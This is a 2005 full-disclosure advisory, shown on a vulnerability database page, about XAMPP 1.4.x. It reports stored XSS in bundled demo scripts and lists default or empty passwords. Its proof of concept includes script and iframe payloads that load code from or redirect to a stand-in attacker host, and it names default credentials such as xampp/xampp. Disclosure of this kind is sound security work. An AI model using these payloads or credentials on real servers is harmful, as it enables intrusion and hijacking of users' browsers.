Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:8295
HistoryApr 12, 2005 - 12:00 a.m.

[Full-disclosure] XAMPP

2005-04-1200:00:00
vulners.com
22
JSON
 - EXPL-A-2005-006 exploitlabs.com Advisory 034 -

                             - XAMPP -

OVERVIEW

XAMPP is an easy to install Apache distribution containing MySQL,
PHP and Perl. XAMPP is really very easy to install and to use

  • just download, extract and start

http://www.apachefriends.org/en/xampp.html

AFFECTED PRODUCTS

Windows Version 1.4.X
http://www.apachefriends.org/en/xampp-windows.html

Linux 1.4.X ( all )
http://www.apachefriends.org/en/xampp-linux.html

Solaris 0.3 ( all )
http://www.apachefriends.org/en/xampp-solaris.html

DETAILS

persistant XSS is present in user supplied input fields
allowing attackers to render any javascript in the users browser.
some javascript will break the application, disallowing further
user input to the script.

http://[host]/xampp/cds.php
http://[host]/xampp/guestbook-en.pl ( linux )
http://[host]/xampp/phonebook.php

default / install usernames and passwords

by viewing http://[host]/xampp/security.php XAMPP discloses
usernames / passwords ( example below )

Item 2a

The phpMyAdmin user pma has no password UNSECURE
phpMyAdmin saves your preferences in an extra MySQL database. To access
this data
phpMyAdmin uses the special user pma. This user has in the default
installation no
password set and to avoid any security problems you should give him a
passwort.

Item 2b

The MySQL user root has no password UNSECURE
Every local user on Linux box can access your MySQL database with
administrator rights.
You should set a password.

Item 2c

The FTP password for user nobody is still 'lampp' UNSECURE
By using the default password for the FTP user nobody everyone can upload
and change
files for your XAMPP webserver. So if you enabled ProFTPD you should set a
new password
for user nobody.

Item 2d

Tomcat Admin/Config User for XAMPP:
User: xampp
Password: xampp

PROOF OF CONCEPT

Item 1a

http://[host]/xampp/cds.php
enter text…
<script language=JavaScript src=http://evilattacker/js.js&gt;&lt;/script&gt;

stores values in the mysql database

also 1c

Item 1b

http://[host]/xampp/guestbook-en.pl
see 1c

Item 1c

http://[host]/xampp/phonebook.php
enter into a input field…

<iframe src=http://evilatacker></iframe>

and when rendered forceably redirects the user to http;//evilattacker

SOLUTION

none ( see vendor response )

vendor response:

Dear Donnie!

> you have a severly insecure package.
> here are my raw notes.

Thank you for your notes. But XAMPP is meant only for internal
development usage and not on production systems.

See http://www.apachefriends.org/en/xampp.html
(section "The philosopy")

The vulnerable scripts are only very simple demonstation programms to
test the functions of Apache/MySQL/etc. and to give beginners first
inspirations in programming.
Also this scripts are not meant for public usage.

But you may be right. We should make the warning messages about the
dangers of use for our software bigger.

researcher comment:

a disclaimer of this type does not mitigate the security issues
present in XAMPP. this package is targeted at beginners, the very
users who need to be protected the most and taught secure by default.

CREDITS

This vulnerability was discovered and researched by
Donnie Werner of Exploitlabs

Donnie Werner
Information Security Specialist
[email protected]

–
web: http://exploitlabs.com
http://exploitlabs.com/files/advisories/EXPL-A-2005-006-xampp.txt

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

JSON